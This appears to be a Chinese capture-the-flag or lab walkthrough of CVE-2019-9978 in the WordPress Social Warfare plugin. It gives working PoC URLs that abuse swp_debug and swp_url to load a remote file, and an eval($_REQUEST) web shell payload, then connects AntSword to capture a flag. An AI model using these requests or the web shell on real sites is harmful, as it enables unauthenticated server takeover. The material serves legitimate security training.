【初级】WordPress social-warfare插件XSS和RCE漏洞

CVE-2019-9978
影响版本:WordPress social-warfare < 3.5.3
漏洞描述:WordPress是一套使用PHP语言开发的博客平台,该平台支持在PHP和MySQL的服务器上架设个人博客网站。social-warfare plugin是使用在其中的一个社交平台分享插件,其3.5.3之前版本存在跨站脚本攻击(XSS)和远程代码执行(RCE)漏洞。远程攻击者可借助这些漏洞,运行任意PHP代码,在无需身份验证的情况下实现对网站和服务器的控制。

攻击:
RCE
●漏洞分析:https://paper.seebug.org/919/
●Poc:
○http://127.0.0.1/wordpress/wp-admin/[xxx].php?swp_debug=load_options&swp_url=http://127.0.0.1/1.php -> xxx.php 不能为前台能访问的路径
○http://127.0.0.1/wordpress/wp-admin/[xxx].php?swp_debug=load_options&swp_url=http://127.0.0.1/rce.txt&test=phpinfo();
●Payload

<pre>
    phpinfo();
	eval($_REQUEST['test'])
</pre>
图片[1]-【初级】WordPress social-warfare插件XSS和RCE漏洞-NGC660 安全实验室
连接蚁剑 -> 注意要添加cookie才能访问
图片[2]-【初级】WordPress social-warfare插件XSS和RCE漏洞-NGC660 安全实验室
拿到flag
图片[3]-【初级】WordPress social-warfare插件XSS和RCE漏洞-NGC660 安全实验室

图片[4]-【初级】WordPress social-warfare插件XSS和RCE漏洞-NGC660 安全实验室
© 版权声明
THE END
喜欢就支持一下吧
点赞9赏点小钱 分享